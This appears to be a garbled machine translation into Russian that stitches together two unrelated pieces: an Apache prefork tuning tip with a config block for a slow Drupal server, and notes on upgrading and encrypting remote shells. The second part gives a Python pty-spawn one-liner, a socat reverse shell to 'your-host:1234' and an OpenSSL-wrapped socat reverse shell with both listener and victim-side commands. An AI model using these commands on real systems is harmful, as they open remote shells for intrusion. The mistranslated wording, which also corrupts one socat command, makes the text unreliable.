Также чрезвычайно важный конфигурация модуля перед ветвлением.. я решительно сократил количество в определенном разделе/etc/apache2/apache2.conf.. с тех пор у меня была крупная задержка, где страница будет останавливаться максимум в течение минуты прежде, чем закончить загружать... трассировку трассировкой drupal и модулями дьявола, а также профилирование с xdebug оставило меня невежественным.. я настроил APC и кивнул MySQL conf, но преступник на самом деле был слишком маленькими значениями для модуля перед ветвлением.. я повысил тех, которые к умеренному И достаточному уровню, и теперь сервер вернулся к молнии быстро. Не упустите эти числа, если у Вас есть необъяснимое высокое время выполнения страницы....
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
# original values:
# MaxSpareServers 10
# MaxClients 150
# far too conservative experimental values:
# MaxSpareServers 5
# MaxClients 5
# good compromise:
MaxSpareServers 10
MaxClients 20
MaxRequestsPerChild 0
</IfModule>
Эти значения для виртуальной серверной среды с 512 МиБ RAM + подкачка на 256 МиБ.. удача, находящая оптимум Вашего сервера ;)
С оговоркой, что незашифрованные оболочки в Интернете - это плохо, в этом посте pentestmonkey есть некоторые методы, которые можно использовать для получения TTY через существующий сеанс оболочки. Наиболее вероятно, что для работы в любой системе используется Python:
python -c 'import pty; pty.spawn("/bin/sh")'
Замените оболочку на любую по вашему выбору.
Это не стандартная программа, но "socat tcp:your-host:1234 exec:bash, имущество" сделает работу.
Можно также защитить связь с OpenSSL с socat:
# Your side: openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.pem socat `tty`,raw,echo=0 openssl-listen:1237,reuseaddr,cert=cert.pem,verify=0 # Their side: socat openssl-connect:127.0.0.1:1237,verify=0 exec:bash,pty,stderr,setsid
Это предоставит хорошему терминалу подключения назад шифрование.